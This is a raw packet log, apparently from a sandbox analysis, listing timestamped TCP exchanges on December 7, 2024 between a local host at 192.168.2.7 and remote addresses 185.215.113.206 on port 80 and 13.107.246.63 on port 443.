Dec 7, 2024 12:59:50.372576952 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.373178005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.373219013 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.373362064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.373404026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.374054909 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.374094963 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.374236107 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.374278069 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.374969959 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.375013113 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.375111103 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.375149012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.375714064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.375755072 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.375885963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.375927925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.376487017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.376529932 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.376652956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.376698971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.377281904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.377326012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.377518892 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.377562046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.378191948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.378233910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.378393888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.378437042 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.378931046 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.378969908 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.379118919 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.379158020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.379774094 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.379817009 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.379962921 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.380004883 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.380572081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.380608082 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.380753994 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.380795002 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.381398916 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.381438971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.381625891 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.381668091 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.382263899 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.382324934 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.382390022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.382433891 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.383049965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.383090019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.383244038 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.383285999 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.383863926 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.383905888 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.384076118 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.384119034 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.384712934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.384757996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.384912014 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.384953976 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.385507107 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.385551929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.385718107 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.385761023 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.386339903 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.386384010 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.386516094 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.386557102 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.522078037 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522161961 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522208929 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522349119 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522360086 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522368908 CET	49806	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522373915 CET	443	49806	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522649050 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522715092 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522777081 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522826910 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522826910 CET	49805	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.522845030 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.522854090 CET	443	49805	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.524988890 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.525052071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.525157928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.525196075 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.525294065 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.525345087 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.525407076 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.525865078 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.525898933 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.525945902 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.526201010 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.526217937 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.526273966 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.526288033 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.526778936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.526791096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.526823997 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.526839972 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.527456045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.527470112 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.527503014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.527509928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.528203011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.528213978 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.528258085 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.528966904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.528978109 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.529010057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.529692888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.529705048 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.529742956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.530498028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.530548096 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.531907082 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.531960964 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.532305956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.532316923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.532351017 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.532963991 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.532975912 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.533030033 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.533756971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.533767939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.533802986 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.534358978 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.534369946 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.534396887 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.534421921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.535034895 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.535046101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.535072088 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.535080910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.535590887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.535604000 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.535630941 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.535639048 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.536303997 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.536315918 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.536343098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.536355972 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.537081003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.537092924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.537118912 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.537127018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.537806988 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.537844896 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.538011074 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.538052082 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.538224936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.538237095 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.538264990 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.538906097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.538959026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.539324999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.539376020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.539676905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.539690971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.539721012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.539727926 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.540462017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.540513992 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.540740967 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.540798903 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.541126966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.541167974 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.541482925 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.541522980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.541838884 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.541877985 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.542264938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.542303085 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.542568922 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.542610884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.542948008 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.542989016 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.543400049 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.543447018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.555248022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.555299044 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.555373907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.555414915 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.555736065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.555777073 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.556087017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.556126118 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.556461096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.556494951 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.556880951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.556921005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.557188034 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.557230949 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.557580948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.557625055 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.557993889 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.558036089 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.558293104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.558336973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.558875084 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.558919907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.559032917 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.559073925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.559717894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.559761047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.559988022 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.560029984 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.560504913 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.560551882 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.560638905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.560682058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.561350107 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.561395884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.561518908 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.561566114 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.562086105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.562129974 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.562293053 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.562340975 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.562921047 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.563064098 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.563112020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.563149929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.563796997 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.563839912 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.563987017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.564032078 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.564574003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.564610958 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.564821005 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.564862013 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.565372944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.565414906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.565586090 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.565628052 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.566212893 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.566253901 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.566390991 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.566427946 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.567027092 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.567069054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.567238092 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.567279100 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.567867041 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.567909956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.568072081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.568115950 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.568692923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.568733931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.568887949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.569211006 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.569561958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.569602966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.569730997 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.569772005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.570372105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.570420027 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.570548058 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.570593119 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.571160078 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.571222067 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.571383953 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.571424007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.572061062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.572109938 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.572277069 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.572316885 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.572834969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.572873116 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.573010921 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.573062897 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.573632956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.573669910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.573905945 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.573942900 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.574454069 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.574491024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.574644089 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.574678898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.575274944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.575316906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.575526953 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.575578928 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.576128960 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.576169014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.576299906 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.576349020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.576915026 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.576966047 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.577121019 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.577167988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.577780008 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.577825069 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.577948093 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.577989101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.578561068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.578608990 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.578789949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.578833103 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.685753107 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.685837030 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.685893059 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.686069012 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.686083078 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.686110973 CET	49807	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.686116934 CET	443	49807	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.688808918 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.688827038 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.688899994 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.689069986 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.689083099 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.717012882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.717068911 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.717453003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.717499018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.717703104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.717747927 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.717956066 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.717998981 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.718254089 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.718295097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.718617916 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.718643904 CET	443	49808	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.718662024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.718919039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.718961000 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.719041109 CET	49808	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.719074011 CET	443	49808	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.719310045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.719352961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.719506025 CET	49808	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:50.719512939 CET	443	49808	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:50.719613075 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.719654083 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.720168114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.720216036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.720434904 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:50.720478058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:50.720911026 CET	80	49788	185.215.113.206	192.168.2.7
